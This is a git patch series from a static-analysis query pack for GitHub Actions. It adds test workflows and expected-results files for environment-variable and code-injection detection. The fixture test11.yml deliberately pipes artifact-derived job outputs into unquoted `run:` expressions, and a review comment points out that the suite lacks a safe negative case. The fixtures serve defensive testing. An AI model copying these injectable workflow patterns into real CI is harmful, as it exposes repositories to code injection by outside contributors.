@@ -66,3 +76,7 @@ subpaths | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index b3da13beda38..2cd369538027 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
+++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -15,6 +15,10 @@ edges | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -48,5 +52,11 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | subpaths #select 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml
new file mode 100644
index 000000000000..dc101c769449
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml
@@ -0,0 +1,56 @@
+name: tests
+
+on:
+ workflow_run:
+ workflows: ["Tests"]
+ types:
+ - completed
+
+permissions: { contents: read }
+
+jobs:
+ get-artifacts:
+ name: Get required artifacts
+ runs-on: ubuntu-latest
+ permissions:
+ actions: read
+ statuses: write
+ outputs:
+ pr_num: ${{ steps.set-ref.outputs.pr_num }}
+ ref: ${{ steps.set-ref.outputs.ref }}
+ steps:
+ - name: Download and extract event file
+ uses: actions/download-artifact@v4
+ with:
+ github-token: ${{ secrets.GITHUB_TOKEN }}
+ run-id: ${{ github.event.workflow_run.id }}
+ name: event_file
+ path: artifacts/event_file
+
+ - name: Try to read PR number
+ id: set-ref
+ run: |
+ pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)
+ if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then
+ pr_num=""
+ fi
+
+ ref=$pr_num
+ if [ -z "$ref" ] || [ "$ref" == "null" ]; then
+ ref=${{ github.ref }}
+ fi
+
+ echo "pr_num=$pr_num" >> $GITHUB_OUTPUT
+ echo "ref=$ref" >> $GITHUB_OUTPUT
+
+ test2:
+ name: test2
+ runs-on: ubuntu-latest
+ needs: get-artifacts
+ permissions:
+ actions: read
+ statuses: write
+ steps:
+ - run: echo ${{ needs.get-artifacts.outputs.pr_num }}
+ - run: echo ${{ needs.get-artifacts.outputs.ref }}
+
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 3f6fd5310c4b..69085548f69d 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
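Review bot: The `test2` job only exercises the unsafe shape, `- run: echo ${{ needs.get-artifacts.outputs.pr_num }}`, so the fixture cannot tell whether the query also stays quiet on the usually recommended form that passes the same output through `env:` and expands it as `"$PR_NUM"` inside the script. Adding that as a third step would give the CWE-094 suite a negative case next to the two positives the expected file reports at lines 54–55. The fixture also carries no comment on the flow being modelled — a job output derived from an artifact of the triggering `workflow_run` reaching a `run:` expression in a downstream job — and a one-line header saying exactly that would document it.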
@@ -92,6 +92,15 @@ edges | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | +| 
.github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | 
@@ -320,6 +329,16 @@ nodes | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | semmle.label | steps.set-ref.outputs.ref | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | semmle.label | Run Step: set-ref [ref] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | 
needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -442,6 +461,8 @@ subpaths | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index bb58a7395a1a..360c33720fb0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -92,6 +92,15 @@ edges | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | +| 
.github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | 
@@ -320,6 +329,16 @@ nodes | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | semmle.label | steps.set-ref.outputs.ref | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | semmle.label | Run Step: set-ref [ref] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | 
needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 2dffb865d0bc7f2d6ca5d5e9791ec579823633b0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Jul 2024 12:45:34 +0200 Subject: [PATCH 422/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 75d8cd5d2e0c..285ea6e16808 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.22 +version: 0.1.23 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ce8ab4c24dd4..a51e583b32c4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.22 +version: 0.1.23 groups: [actions, queries] suites: codeql-suites extractor: javascript From 12e78ac4fe4162920e0418129f90a5b2fc8a35ba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Jul 2024 23:37:04 +0200 Subject: [PATCH 423/707] fix(regex): update pattern to match both gh and hub commands --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 2 +- 1 file changed, 1 